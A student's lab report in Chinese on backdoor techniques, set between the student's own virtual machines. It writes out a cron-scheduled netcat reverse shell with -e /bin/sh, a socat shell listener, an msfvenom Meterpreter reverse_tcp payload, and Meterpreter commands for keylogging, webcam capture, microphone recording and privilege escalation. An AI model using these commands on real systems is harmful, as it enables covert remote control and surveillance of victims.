2. 程式人生 > >20155227《網絡對抗》Exp2 後門原理與實踐

20155227《網絡對抗》Exp2 後門原理與實踐

阿新 發佈:2018-03-28
web img 準備 etc ons 並運行 reverse 體會 定時

20155227《網絡對抗》Exp2 後門原理與實踐

基礎問題回答

(1)例舉你能想到的一個後門進入到你系統中的可能方式?

  • 在非官方網站下載軟件時,後門很可能被捆綁在軟件中。

  • 攻擊者利用欺騙的手段,通過發送電子郵件或者文件,並誘使主機的操作員打開或運行藏有木馬程序的郵件或文件,這些木馬程序就會在主機上創建一個後門。

(2)例舉你知道的後門如何啟動起來(win及linux)的方式?

  • Linux下可以通過cron來啟動
  • Windows下在控制面板的管理工具中可以設置任務計劃啟動,或者通過修改註冊表來達到自啟的目的;

(3)Meterpreter有哪些給你映像深刻的功能?

  • 獲取攝像頭以及對靶機直接截屏,感覺很方便很厲害的樣子

(4)如何發現自己有系統有沒有被安裝後門?

  • 用殺毒軟件進行掃描。
  • 檢查端口和進程。

實驗準備(常用後門工具實踐)

Windows獲得Linux Shell

  • Windows下查看ip
    技術分享圖片

  • windows 打開監聽
    技術分享圖片

  • Linux反彈連接win
    技術分享圖片

  • windows下獲得一個linux shell,可運行任何指令
    技術分享圖片

Linux獲得Win Shell

  • Linux運行監聽指令
    技術分享圖片

  • Windows反彈連接Linux
    技術分享圖片

  • Linux下看到Windows的命令提示
    技術分享圖片

nc傳輸數據

如圖:
技術分享圖片

實驗內容及過程

1.使用netcat獲取主機操作Shell,cron啟動

  • Windows系統下,監聽5227端口。
    技術分享圖片

  • crontab -e指令編輯一條定時任務,在最後一行添加50 * * * * /bin/netcat 192.168.56.1 5227 -e /bin/sh

  • 時間到了之後獲得了kalishell,可以輸入指令。
    技術分享圖片

技術分享圖片

2.使用socat獲取主機操作Shell, 任務計劃啟動

  • Windows系統下,打開控制面板->管理工具->任務計劃程序,創建任務,填寫任務名稱後,新建一個觸發器:
    技術分享圖片

  • 在操作->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5227 exec:cmd.exe,pty,stderr
    技術分享圖片

  • 運行剛剛創建的任務:
    技術分享圖片

  • 在kali中輸入指令socat - tcp:192.168.56.1:5227

    ,此時可以發現已經成功獲得了一個cmd shell
    技術分享圖片

3.使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

  • 輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.115.128 LPORT=5227 -f exe > 20155227_backdoor.exe
    技術分享圖片

  • 將生成的後門程序復制到Windows主機上,也可以通過nc指令將生成的後門程序傳送到Windows主機上

  • Kali上使用msfconsole指令進入msf控制臺,使用監聽模塊,設置payload,設置反彈回連的IP和端口
    技術分享圖片

  • 打開Windows上的後門程序

  • 此時Kali上已經獲得了Windows主機的連接,並且得到了遠程控制的shell
    技術分享圖片

4.使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

  • 使用help查看指令
    技術分享圖片

  • 使用record_mic指令截獲一段音頻:
    技術分享圖片

  • 使用webcam_snap指令使用攝像頭進行拍照:
    技術分享圖片

技術分享圖片

  • 使用screenshot指令可以進行截屏:
    技術分享圖片
    技術分享圖片

  • 使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄:
    技術分享圖片

  • 使用getsystem指令進行提權,提權失敗(win10):
    技術分享圖片

  • 使用sysinfo查詢電腦系統詳細版本信息:
    技術分享圖片

實驗過程中遇到的問題及解決

  • 問題:在設置payload過程中出現Handler failed to bind to XXX的錯誤。
    技術分享圖片

  • 解決:我在生成後門程序時不小心使用的是Windows的ip地址,改為kali的ip(相應的設置也改為kali的ip)之後問題解決。

實驗體會

這次的實驗非常有意思,使用MSF的時候,錄音、截屏、照相、獲取擊鍵記錄的實踐讓我在感到神奇的同時,也意識到我們的系統是很脆弱的。要保護好自己的隱私,就要提高安全意識。

20155227《網絡對抗》Exp2 後門原理與實踐

相關推薦

20155227對抗Exp2 後門原理實踐

web img 準備 etc ons 並運行 reverse 體會 定時 20155227《網絡對抗》Exp2 後門原理與實踐 基礎問題回答 (1)例舉你能想到的一個後門進入到你系統中的可能方式? 在非官方網站下載軟件時,後門很可能被捆綁在軟件中。 攻擊者利用欺騙的手段,

對抗技術 2017-2018-2 20152515 Exp2 後門原理實踐

技術分享 cnblogs 利用 mage 可選 任務計劃 攝像頭 寫入 提權 1.實驗內容 (1)使用netcat獲取主機操作Shell,cron啟動 (0.5分) (2)使用socat獲取主機操作Shell, 任務計劃啟動 (0.5分) (3)使用MSF meterp

20154324 劉康權 《對抗Exp2 後門原理實踐

nsh png netcat nta vim編輯 時間 clas 自己的 rontab 一、實踐目標與內容 1.學習內容 使用nc實現win,mac,Linux間的後門連接 meterpreter的應用 MSF POST 模塊的應用 2.學習目標 學習建立一個後門連接

2018-2019-2 對抗技術 20165230 Exp2 後門原理實踐

ping 反向連接 後門 操作 netcat 方式 拍照 art 基本 目錄 1.實驗內容 2.基礎問題回答 3.常用後門工具實踐 3.1netcat 3.

2018-2019-2 對抗技術 20165231 Exp2 後門原理實踐

class 一個 打開 功能 目標 rontab head 定時任務 con 實驗內容 1.使用netcat獲取主機操作Shell,cron啟動 2.使用socat獲取主機操作Shell, 任務計劃啟動 3.使用MSF meterpreter(或其他軟件)生成可執

2018-2019-2 20165331《對抗技術》Exp2 後門原理實踐

ima 例如 pty 並運行 art 就是 輸入 options lin 2018-2019-2 20165331《網絡對抗技術》Exp2 後門原理與實踐 實驗收獲與感想 通過本次實驗,我對後門的生成及工作原理有了更深的理解,也學會了怎樣用後門攻擊同一網段下的不同主機。但是

網路對抗技術Exp2-後門原理實踐

**後門概念** 後門就是不經過正常認證流程而訪問系統的通道。 哪裡有後門呢? 編譯器留後門 作業系統留後門 最常見的當然還是應用程式中留後門 還有就是潛伏於作業系統中或偽裝為特定應用的專用後門程式。 -- 下面是近些年的一些例子: 編譯器:蘋果Xcode後門事件。蘋果Xcode後門事件中招的APP包

Exp2 後門原理實踐(未完待續)

bin image alt job 模塊 加強 ont .sh 問題 Exp2 後門原理與實踐 實驗環境 攻擊機 kali 4.14(64位) (IP: 10.0.2.6/24) 靶機 ubuntu 16.04(32位) (IP: 10.0.2.4/24) windo

20155216 Exp2 後門原理實踐

hand 地址 同時 bin log code 文字 其他 進行 後門原理與實踐 常用後門工具 NC 或 netcat netcat是一個底層工具,進行基本的TCP UDP數據收發。常被與其他工具結合使用,起到後門的作用。 Linux: 一般自帶netcat,"man ne

Exp2 後門原理實踐 20154301仉鑫燁

編輯 lock 命令 兩臺 鎖定 com windows 程序 獲取 20154301《網絡對抗》Exp2 後門原理與實踐 20154301仉鑫燁 一、實驗內容 常用後門工具實踐: Windows獲得Linux Shell: 在Windows下,先使用ipconf

20155312 張競予 Exp2 後門原理實踐

gets std pty ever 哪些 分享圖片 程序 啟動過程 學會 Exp2 後門原理與實踐 目錄 基礎問題回答 (1)例舉你能想到的一個後門進入到你系統中的可能方式? (2)例舉你知道的後門如何啟動起來(win及linux)的方式? (3)Meterprete

Exp2 後門原理實踐

linux title 本機 學習目標 ont 網段 OS net channel 一、實踐目標與內容 1.學習內容 使用nc實現win,mac,Linux間的後門連接 meterpreter的應用 MSF POST 模塊的應用 2.學習目標 學習建

20155209 林虹宇Exp2 後門原理實踐

拍照 端口 一個 err 當前 list gets 沒有 com Exp2 後門原理與實踐 實驗內容 一、使用netcat獲取主機操作Shell,cron啟動 使用netcat獲取主機操作Shell Win獲得Linux Shell 查看win的ip地址 windo

20155334 曹翔 Exp2 後門原理實踐

bubuko 直接 net 重定向 system 技術 image AR ali 20155334 曹翔 Exp2 後門原理與實踐 不多廢話直接上實驗過程,本實驗的所有端口都是5334。 一、實驗過程 查詢主機Windows和虛擬機kali的ip地址: Windows

Exp2 後門原理實踐 ——20164316張子遙

操作系統 linux定時任務 con 管理員 遠程控制 clear 最後一行 任務管理器 地址 一、實踐基本內容 1.實踐目標 (1)使用netcat獲取主機操作Shell,cron啟動 (2)使用socat獲取主機操作Shell, 任務計劃啟動 (3)使用MS

20165306 Exp2 後門原理實踐

技術分享 out web hot erp 流程 常用 開始 cron 20165306 Exp2 後門原理與實踐 實驗內容 (1)使用netcat獲取主機操作Shell,cron啟動 (2)使用socat獲取主機操作Shell, 任務計劃啟動 (3)使用MSF meterp

20165229 NetSec Exp2後門原理實踐

其他 準備 tun sfc ip地址 開機 消息 cor mach 20165229 NetSec Exp2後門原理與實踐 一、基礎問題 例舉你能想到的一個後門進入到你系統中的可能方式? 打開一個掛碼網頁,會自動下載安裝並執行木馬程序,在系統中留下後門。 將不明來源

Exp2後門原理實踐 20164312馬孝濤

有一個 方式 提權 3.2 控制 傳輸 監聽 web show 實驗內容 使用netcat獲取主機操作Shell,cron啟動 (0.5分) 使用socat獲取主機操作Shell, 任務計劃啟動 (0.5分) 使用MSF meterpreter

# 2018-2019-2 《對抗技術》Exp2 後門原理應用 20165210

啟動組 and 攝像頭 完成 lis 準備就緒 下載文件 list ont 2018-2019-2 《網絡對抗技術》Exp2 後門原理與應用 20165210 實驗內容: 使用netcat獲取主機操作Shell,cron啟動。 使用Socat獲取主機操作Shell,任務計

20154307 《對抗技術》實驗二 後門原理實踐

文件的 img 選擇 msfvenom 任務計劃 err clas 關閉 ali 20154307 《網絡對抗技術》實驗二 後門原理與實踐 一、基礎問題回答 (1)例舉你能想到的一個後門進入到你系統中的可能方式? 答:下載盜版軟件或者盜版電影的時候。 (2)例舉你知道的後門